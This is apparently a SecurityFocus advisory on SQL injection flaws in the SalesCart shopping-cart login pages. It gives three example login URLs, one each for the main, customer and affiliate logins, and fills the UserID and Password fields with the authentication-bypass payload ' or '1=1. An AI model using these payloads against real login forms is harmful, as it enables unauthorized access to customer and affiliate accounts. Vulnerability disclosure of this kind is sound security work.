SalesCart Login Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example data is available:

http://www.example.com/scorderdemo/online/default.asp

UserID : ' or '1=1
Password : ' or '1=1

http://www.example.com/scorderdemo/online/customer/customer_login.asp

Ship-to Email Address : xxx@c4team.org
Password : ' or '1=1

http://www.example.com/scorderdemo/online/affiliate/affiliate_login.asp

Ship-to Email Address : xxx@c4team.org
Password : ' or '1=1


 

Privacy Statement
Copyright 2010, SecurityFocus